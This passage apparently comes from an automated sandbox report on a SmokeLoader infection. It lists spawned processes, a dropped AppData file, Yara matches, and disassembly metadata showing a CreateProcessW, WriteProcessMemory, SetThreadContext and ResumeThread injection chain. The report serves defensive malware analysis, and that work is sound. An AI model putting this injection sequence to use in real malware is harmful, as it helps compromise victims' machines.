                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:16
                                                    Start time:13:25:31
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\System32\taskeng.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:taskeng.exe {B5E7D6C9-0A45-4095-9C68-D1725C8390DE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                    Imagebase:0xff6a0000
                                                    File size:464'384 bytes
                                                    MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    General

                                                    Target ID:17
                                                    Start time:13:25:32
                                                    Start date:31/08/2024
                                                    Path:C:\Users\user\AppData\Roaming\gwseuha
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\gwseuha
                                                    Imagebase:0x13a0000
                                                    File size:64'704 bytes
                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 0%, Virustotal, Browse
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:13:25:32
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:13:25:33
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\explorer.exe
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:13:25:34
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:13:25:36
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    General

                                                    Target ID:23
                                                    Start time:13:25:37
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\explorer.exe
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    General

                                                    Target ID:24
                                                    Start time:13:25:39
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Has exited:false

                                                    General

                                                    Target ID:25
                                                    Start time:13:25:40
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\explorer.exe
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    Has exited:false

                                                    General

                                                    Target ID:26
                                                    Start time:13:25:41
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                    Imagebase:0x9c0000
                                                    File size:2'972'672 bytes
                                                    MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    General

                                                    Target ID:27
                                                    Start time:13:25:42
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\explorer.exe
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Executed Functions

                                                      Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.367223692.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_19d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: afcc702efb120f14cebbfb0a637f8a2a9331f3432e527806ab1702076291e174
                                                      • Instruction ID: 3fc9cc7846ee4ed0904c49d21d8d86c1277ba0f410744eb978c001339dd3bd7d
                                                      • Opcode Fuzzy Hash: afcc702efb120f14cebbfb0a637f8a2a9331f3432e527806ab1702076291e174
                                                      • Instruction Fuzzy Hash: A201A771504340AAEB104E19DC84B67BFD8EF41764F2CC51AFC494B286C779D845C6B1
                                                      Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.367223692.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_19d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2dfe5afc35c2925d5075eedba4baa2777c11c21e2b3997992bb7b27b55e44dfa
                                                      • Instruction ID: 9a6721b48d1fa34f0e04ebdcfe9b2327cf7d46ddbbc22a47dcf73b94fa234ca1
                                                      • Opcode Fuzzy Hash: 2dfe5afc35c2925d5075eedba4baa2777c11c21e2b3997992bb7b27b55e44dfa
                                                      • Instruction Fuzzy Hash: 25F06271404344AFEB108E1ADCC8BA6FFD8EB51774F18C55AED484E286C3799C45CAB1

                                                      Execution Graph

                                                      Execution Coverage:8.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:58.7%
                                                      Total number of Nodes:46
                                                      Total number of Limit Nodes:2
                                                      execution_graph 5881 554b40 5882 554b67 5881->5882 5885 554c90 5882->5885 5886 554ca0 5885->5886 5887 554c7c 5886->5887 5890 554d58 5886->5890 5906 554d48 5886->5906 5891 554d8b 5890->5891 5922 55172c 5891->5922 5893 554f54 5894 551738 Wow64SetThreadContext 5893->5894 5896 555053 5893->5896 5894->5896 5895 551774 WriteProcessMemory 5897 55537c 5895->5897 5896->5895 5898 55561b 5897->5898 5903 551774 WriteProcessMemory 5897->5903 5899 551774 WriteProcessMemory 5898->5899 5900 55566c 5899->5900 5901 551780 Wow64SetThreadContext 5900->5901 5902 55576f 5900->5902 5901->5902 5904 551798 ResumeThread 5902->5904 5903->5897 5905 555821 5904->5905 5905->5886 5908 554d58 5906->5908 5907 55172c CreateProcessW 5909 554f54 5907->5909 5908->5907 5912 555053 5909->5912 5937 551738 5909->5937 5926 551774 5912->5926 5913 55561b 5914 551774 WriteProcessMemory 5913->5914 5915 55566c 5914->5915 5918 55576f 5915->5918 5930 551780 5915->5930 5917 55537c 5917->5913 5919 551774 WriteProcessMemory 5917->5919 5934 551798 5918->5934 5919->5917 5923 555930 CreateProcessW 5922->5923 5925 555b24 5923->5925 5927 555f98 WriteProcessMemory 5926->5927 5929 556078 5927->5929 5929->5917 5931 555c68 Wow64SetThreadContext 5930->5931 5933 555d24 5931->5933 5933->5918 5935 5560d8 ResumeThread 5934->5935 5936 555821 5935->5936 5936->5886 5938 555c68 Wow64SetThreadContext 5937->5938 5940 555d24 5938->5940 5940->5912

                                                      Executed Functions

                                                      Function 00554D58 Relevance: .7, Instructions: 658COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 437 554d58-554d89 438 554d90-554ec6 437->438 439 554d8b 437->439 444 554ecd-554f02 438->444 445 554ec8 438->445 439->438 447 554f04-554f2e 444->447 448 554f2f-554f74 call 55172c 444->448 445->444 447->448 452 554f76-554f92 448->452 453 554f9d-554fc3 448->453 452->453 456 554fc5 453->456 457 554fca-55500c 453->457 456->457 461 555013-55503f 457->461 462 55500e 457->462 464 555041-555073 call 551738 461->464 465 5550a0-5550d1 call 551744 461->465 462->461 472 555075-555091 464->472 473 55509c-55509e 464->473 470 5550d3-5550ef 465->470 471 5550fa-555104 465->471 470->471 474 555106 471->474 475 55510b-55512e 471->475 472->473 473->471 474->475 476 555135-555179 call 551750 475->476 477 555130 475->477 484 5551a2-5551ab 476->484 485 55517b-555197 476->485 477->476 486 5551d7-5551d9 484->486 487 5551ad-5551d5 call 55175c 484->487 485->484 488 5551df-5551f3 486->488 487->488 491 5551f5-555211 488->491 492 55521c-555226 488->492 491->492 494 55522d-555251 492->494 495 555228 492->495 500 555253 494->500 501 555258-5552aa call 551768 494->501 495->494 500->501 505 5552c2-5552c4 501->505 506 5552ac-5552c0 501->506 507 5552ca-5552de 505->507 506->507 508 5552e0-55531a call 551768 507->508 509 55531b-555335 507->509 508->509 511 555337-555353 509->511 512 55535e-55539c call 551774 509->512 511->512 517 5553c5-5553cf 512->517 518 55539e-5553ba 512->518 520 5553d6-5553e6 517->520 521 5553d1 517->521 518->517 523 5553ed-555415 520->523 524 5553e8 520->524 521->520 527 555417 523->527 528 55541c-55542b 523->528 524->523 527->528 529 5555f6-555615 528->529 530 555430-55543e 529->530 531 55561b-555642 529->531 532 555445-55546c 530->532 533 555440 530->533 535 555644 531->535 536 555649-55568c call 551774 531->536 539 555473-55549a 532->539 540 55546e 532->540 533->532 535->536 543 5556b5-5556bf 536->543 544 55568e-5556aa 536->544 545 5554a1-5554d5 539->545 546 55549c 539->546 540->539 547 5556c6-5556f3 543->547 548 5556c1 543->548 544->543 553 5555c1-5555ce 545->553 554 5554db-5554e9 545->554 546->545 555 5556f5-5556ff 547->555 556 555700-55570c 547->556 548->547 561 5555d5-5555e9 553->561 562 5555d0 553->562 557 5554f0-5554f7 554->557 558 5554eb 554->558 555->556 559 555713-555723 556->559 560 55570e 556->560 565 5554fe-555546 557->565 566 5554f9 557->566 558->557 567 555725 559->567 568 55572a-55575b 559->568 560->559 563 5555f0 561->563 564 5555eb 561->564 562->561 563->529 564->563 577 55554d-555572 call 551774 565->577 578 555548 565->578 566->565 567->568 571 55575d-55576a call 551780 568->571 572 5557bc-5557ed call 55178c 568->572 579 55576f-55578f 571->579 580 555816-55581c call 551798 572->580 581 5557ef-55580b 572->581 585 555577-555597 577->585 578->577 583 555791-5557ad 579->583 584 5557b8-5557ba 579->584 590 555821-555841 580->590 581->580 583->584 584->580 588 5555c0 585->588 589 555599-5555b5 585->589 588->553 589->588 592 555843-55585f 590->592 593 55586a-55590d 590->593 592->593
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextMemoryProcessThreadWow64Write
                                                      • String ID:
                                                      • API String ID: 3696009080-0
                                                      • Opcode ID: 9124b77897fde315e41200fba80ca91cd611cc533adf4d45789870eb99ffc089
                                                      • Instruction ID: 0241623a229cf8e1792e1563d75b26ee1da30dc02e451ff2e2522ad9904adf08
                                                      • Opcode Fuzzy Hash: 9124b77897fde315e41200fba80ca91cd611cc533adf4d45789870eb99ffc089
                                                      • Instruction Fuzzy Hash: 7362D474D116298FDB68DF29C894BEDBBB2BB89301F5081EA940DA7251EB305EC5CF50
                                                      Function 00554D48 Relevance: .5, Instructions: 522COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88d967c410c325d508d6a63227842cd68232bd3c63df49ae6d0ce10cb422f02e
                                                      • Instruction ID: 27776dac310cc3ceeffa5761601353cf2db612c9ee4297bed2cceeb574542522
                                                      • Opcode Fuzzy Hash: 88d967c410c325d508d6a63227842cd68232bd3c63df49ae6d0ce10cb422f02e
                                                      • Instruction Fuzzy Hash: D432E374D016298FDB68DF25C864BEDBBB2BB89301F5081EAD50DA7291EB305E85CF50
                                                      Function 00880B98 Relevance: 21.7, Strings: 17, Instructions: 484COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 880b98-880bbb 1 880bc1-880bc6 0->1 2 880d96-880ddb 0->2 3 880bc8-880bce 1->3 4 880bde-880be2 1->4 14 880de1-880de6 2->14 15 880f32-880f7e 2->15 8 880bd0 3->8 9 880bd2-880bdc 3->9 5 880be8-880bec 4->5 6 880d43-880d4d 4->6 12 880bee-880bfd 5->12 13 880bff 5->13 10 880d5b-880d61 6->10 11 880d4f-880d58 6->11 8->4 9->4 19 880d63-880d65 10->19 20 880d67-880d73 10->20 21 880c01-880c03 12->21 13->21 16 880de8-880dee 14->16 17 880dfe-880e02 14->17 44 8810eb-88111d 15->44 45 880f84-880f89 15->45 22 880df0 16->22 23 880df2-880dfc 16->23 25 880e08-880e0a 17->25 26 880edf-880ee9 17->26 24 880d75-880d93 19->24 20->24 21->6 27 880c09-880c29 21->27 22->17 23->17 30 880e1a 25->30 31 880e0c-880e18 25->31 33 880eeb-880ef4 26->33 34 880ef7-880efd 26->34 59 880c48 27->59 60 880c2b-880c46 27->60 38 880e1c-880e1e 30->38 31->38 35 880eff-880f01 34->35 36 880f03-880f0f 34->36 42 880f11-880f2f 35->42 36->42 38->26 43 880e24-880e28 38->43 47 880e48 43->47 48 880e2a-880e46 43->48 82 88112d 44->82 83 88111f-88112b 44->83 51 880f8b-880f91 45->51 52 880fa1-880fa5 45->52 55 880e4a-880e4c 47->55 48->55 53 880f93 51->53 54 880f95-880f9f 51->54 56 88109a-8810a4 52->56 57 880fab-880fad 52->57 53->52 54->52 55->26 64 880e52-880e65 55->64 62 8810b2-8810b8 56->62 63 8810a6-8810af 56->63 66 880fbd 57->66 67 880faf-880fbb 57->67 65 880c4a-880c4c 59->65 60->65 70 8810ba-8810bc 62->70 71 8810be-8810ca 62->71 92 880e6b-880e6d 64->92 65->6 73 880c52-880c54 65->73 74 880fbf-880fc1 66->74 67->74 78 8810cc-8810e8 70->78 71->78 80 880c64 73->80 81 880c56-880c62 73->81 74->56 84 880fc7-880fc9 74->84 89 880c66-880c68 80->89 81->89 87 88112f-881131 82->87 83->87 90 880fd9 84->90 91 880fcb-880fd7 84->91 93 88117d-881187 87->93 94 881133-881139 87->94 89->6 95 880c6e-880c8e 89->95 97 880fdb-880fdd 90->97 91->97 100 880e6f-880e75 92->100 101 880e85-880edc 92->101 98 881189-88118f 93->98 99 881192-881198 93->99 102 88113b-88113d 94->102 103 881147-881164 94->103 129 880c90-880c96 95->129 130 880ca6-880caa 95->130 97->56 104 880fe3-880fe5 97->104 110 88119a-88119c 99->110 111 88119e-8811aa 99->111 105 880e79-880e7b 100->105 106 880e77 100->106 102->103 124 8811ca-8811cf 103->124 125 881166-881177 103->125 112 880fff-881003 104->112 113 880fe7-880fed 104->113 105->101 106->101 117 8811ac-8811c7 110->117 111->117 114 88101d-881097 112->114 115 881005-88100b 112->115 118 880fef 113->118 119 880ff1-880ffd 113->119 121 88100d 115->121 122 88100f-88101b 115->122 118->112 119->112 121->114 122->114 124->125 125->93 135 880c98 129->135 136 880c9a-880c9c 129->136 131 880cac-880cb2 130->131 132 880cc4-880cc8 130->132 137 880cb4 131->137 138 880cb6-880cc2 131->138 141 880ccf-880cd1 132->141 135->130 136->130 137->132 138->132 144 880ce9-880d40 141->144 145 880cd3-880cd9 141->145 146 880cdb 145->146 147 880cdd-880cdf 145->147 146->144 147->144
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p$4'p$4'p$8#g$8#g$l;}$l;}$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                                      • API String ID: 0-1411758938
                                                      • Opcode ID: dd80fbdf92ad5515d453a6f6fc0809eaeaf1a4e0d34f36a9cc09c89bfd3c821c
                                                      • Instruction ID: da411795cf733548d55c7e255f8d699fa4bafe47a597d2d6577706861fd9507e
                                                      • Opcode Fuzzy Hash: dd80fbdf92ad5515d453a6f6fc0809eaeaf1a4e0d34f36a9cc09c89bfd3c821c
                                                      • Instruction Fuzzy Hash: 1DF14735B002059FDBA4AE69C81477ABBA6FFC5310F28847AD945CB281DF71DC4ACB61
                                                      Function 0088203C Relevance: 8.8, Strings: 6, Instructions: 1318COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 149 88203c-88203f 150 882041-882043 149->150 151 882045-88204d 149->151 150->151 152 88204f-882055 151->152 153 882065-882069 151->153 156 882059-882063 152->156 157 882057 152->157 154 88206f-882073 153->154 155 882194-88219e 153->155 158 8820b3 154->158 159 882075-882086 154->159 160 8821ac-8821b2 155->160 161 8821a0-8821a9 155->161 156->153 157->153 164 8820b5-8820b7 158->164 169 8821ec-88223b 159->169 170 88208c-882091 159->170 162 8821b8-8821c4 160->162 163 8821b4-8821b6 160->163 167 8821c6-8821e9 162->167 163->167 164->155 168 8820bd-8820c1 164->168 168->155 172 8820c7-8820cb 168->172 180 88243e-88244d 169->180 181 882241-882246 169->181 174 8820a9-8820b1 170->174 175 882093-882099 170->175 172->155 173 8820d1-8820f7 172->173 173->155 193 8820fd-882101 173->193 174->164 177 88209b 175->177 178 88209d-8820a7 175->178 177->174 178->174 184 882248-88224e 181->184 185 88225e-882262 181->185 187 882250 184->187 188 882252-88225c 184->188 190 882268-88226a 185->190 191 8823e7-8823f1 185->191 187->185 188->185 194 88227a 190->194 195 88226c-882278 190->195 196 8823fd-882403 191->196 197 8823f3-8823fa 191->197 199 882103-88210c 193->199 200 882124 193->200 201 88227c-88227e 194->201 195->201 202 882409-882415 196->202 203 882405-882407 196->203 204 88210e-882111 199->204 205 882113-882120 199->205 207 882127-882134 200->207 201->191 206 882284-8822a3 201->206 208 882417-88243b 202->208 203->208 209 882122 204->209 205->209 218 8822b3 206->218 219 8822a5-8822b1 206->219 214 88213a-882191 207->214 209->207 220 8822b5-8822b7 218->220 219->220 220->191 221 8822bd-8822c1 220->221 221->191 222 8822c7-8822cb 221->222 223 8822cd-8822dc 222->223 224 8822de 222->224 225 8822e0-8822e2 223->225 224->225 225->191 226 8822e8-8822ec 225->226 226->191 227 8822f2-882311 226->227 230 882329-882334 227->230 231 882313-882319 227->231 232 882343-88235f 230->232 233 882336-882339 230->233 234 88231b 231->234 235 88231d-88231f 231->235 236 88237c-882386 232->236 237 882361-882374 232->237 233->232 234->230 235->230 238 882388 236->238 239 88238a-8823d8 236->239 237->236 240 8823dd-8823e4 238->240 239->240
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (op$(op$L4p$L4p$L4p$d=}
                                                      • API String ID: 0-1571529565
                                                      • Opcode ID: ca3fa7546175150b7a8ae4519d0837070680aef3f31e45a5e0cac43026dc5037
                                                      • Instruction ID: 713077d1de9974b91b5d5633ceb82093d46da724fa306da15c23ef75e87d6e02
                                                      • Opcode Fuzzy Hash: ca3fa7546175150b7a8ae4519d0837070680aef3f31e45a5e0cac43026dc5037
                                                      • Instruction Fuzzy Hash: 8EB13835700248DFDB29AF68C854BAEBBA2FF85310F648466E941CB291CB75DC45CB51
                                                      Function 00881730 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 247 881730-881733 248 881739-881741 247->248 249 881735-881737 247->249 250 881759-88175d 248->250 251 881743-881749 248->251 249->248 254 88188e-881898 250->254 255 881763-881765 250->255 252 88174b 251->252 253 88174d-881757 251->253 252->250 253->250 258 88189a-8818a3 254->258 259 8818a6-8818ac 254->259 256 881775 255->256 257 881767-881773 255->257 261 881777-881779 256->261 257->261 262 8818ae-8818b0 259->262 263 8818b2-8818be 259->263 261->254 265 88177f-881783 261->265 264 8818c0-8818df 262->264 263->264 266 881785-881794 265->266 267 881796 265->267 269 881798-88179a 266->269 267->269 269->254 271 8817a0-8817a2 269->271 272 8817b2 271->272 273 8817a4-8817b0 271->273 275 8817b4-8817b6 272->275 273->275 275->254 276 8817bc-8817be 275->276 277 8817d8-8817e3 276->277 278 8817c0-8817c6 276->278 281 8817f2-8817fe 277->281 282 8817e5-8817e8 277->282 279 8817c8 278->279 280 8817ca-8817d6 278->280 279->277 280->277 283 88180c-881813 281->283 284 881800-881802 281->284 282->281 286 88181a-88181c 283->286 284->283 287 88181e-881824 286->287 288 881834-88188b 286->288 289 881828-88182a 287->289 290 881826 287->290 289->288 290->288
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p$$p$$p$$p
                                                      • API String ID: 0-2334450948
                                                      • Opcode ID: d79878c477119db2042772238adf14a2318a5ae188722fed2eecab71f011cbcd
                                                      • Instruction ID: c4da622cabd430b0f4a41d6e25289006d3a6acadd487c86582dd1658a97794ff
                                                      • Opcode Fuzzy Hash: d79878c477119db2042772238adf14a2318a5ae188722fed2eecab71f011cbcd
                                                      • Instruction Fuzzy Hash: F741FF35700205DBCF297A6884096AAFBEAFBC1310BA8857ED855CA259DF70CC42C752
                                                      Function 00881B7F Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 325 881b7f-881b97 327 881b9e-881ba0 325->327 328 881bb8-881c0f 327->328 329 881ba2-881ba8 327->329 331 881baa 329->331 332 881bac-881bae 329->332 331->328 332->328
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p
                                                      • API String ID: 0-3973980265
                                                      • Opcode ID: f45afd339e754e5a86aa42e3140dbdfdca2ddba0b0b5c4722aefd3c39fd4bd41
                                                      • Instruction ID: 385f0109dca8dee5fcfa7e5fbee19699e95ac825e23372b5fdb5b72b2d0ecfd5
                                                      • Opcode Fuzzy Hash: f45afd339e754e5a86aa42e3140dbdfdca2ddba0b0b5c4722aefd3c39fd4bd41
                                                      • Instruction Fuzzy Hash: A2E0D831B043449ECF58766490253AC7B65FFD2325F6481EBC480C6245DE20CD17C392
                                                      Function 0055172C Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 333 55172c-5559bb 335 5559d2-5559e0 333->335 336 5559bd-5559cf 333->336 337 5559f7-555a33 335->337 338 5559e2-5559f4 335->338 336->335 339 555a35-555a44 337->339 340 555a47-555b22 CreateProcessW 337->340 338->337 339->340 344 555b24-555b2a 340->344 345 555b2b-555bf4 340->345 344->345 354 555bf6-555c1f 345->354 355 555c2a-555c35 345->355 354->355 358 555c36 355->358 358->358
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00555B0F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 9b669bbd720cd51dbd08652b36ad5bbdd383205b8bba77df5cc2c65e690aa1aa
                                                      • Instruction ID: de25b5b71091c416423e8c0e83df5b6f065d3c1c5fdd212eb8220a799c4eabb8
                                                      • Opcode Fuzzy Hash: 9b669bbd720cd51dbd08652b36ad5bbdd383205b8bba77df5cc2c65e690aa1aa
                                                      • Instruction Fuzzy Hash: 7C81C274D0026D9FDF25CFA9C954BDDBBB5BB09300F0090AAE549B7220D7749A89CF54
                                                      Function 0055592F Relevance: 1.7, APIs: 1, Instructions: 236processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 360 55592f-5559bb 361 5559d2-5559e0 360->361 362 5559bd-5559cf 360->362 363 5559f7-555a33 361->363 364 5559e2-5559f4 361->364 362->361 365 555a35-555a44 363->365 366 555a47-555b22 CreateProcessW 363->366 364->363 365->366 370 555b24-555b2a 366->370 371 555b2b-555bf4 366->371 370->371 380 555bf6-555c1f 371->380 381 555c2a-555c35 371->381 380->381 384 555c36 381->384 384->384
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00555B0F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 3ef65829f80a588191fa1ba54ac98696b03b628c709b3f2d8666bbc1a4a3173a
                                                      • Instruction ID: fba05e74e87a2e1c0dd2e7c3cfcc5ff11510ed99f611894c2fbd42955f235f48
                                                      • Opcode Fuzzy Hash: 3ef65829f80a588191fa1ba54ac98696b03b628c709b3f2d8666bbc1a4a3173a
                                                      • Instruction Fuzzy Hash: A781C074C0026D9FDF25CFA8C950BDDBBB1BB09300F0090AAE549B7220DB749A89CF54
                                                      Function 00555F91 Relevance: 1.6, APIs: 1, Instructions: 114injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 386 555f91-555fff 388 556016-556076 WriteProcessMemory 386->388 389 556001-556013 386->389 390 55607f-5560bd 388->390 391 556078-55607e 388->391 389->388 391->390
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00556066
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
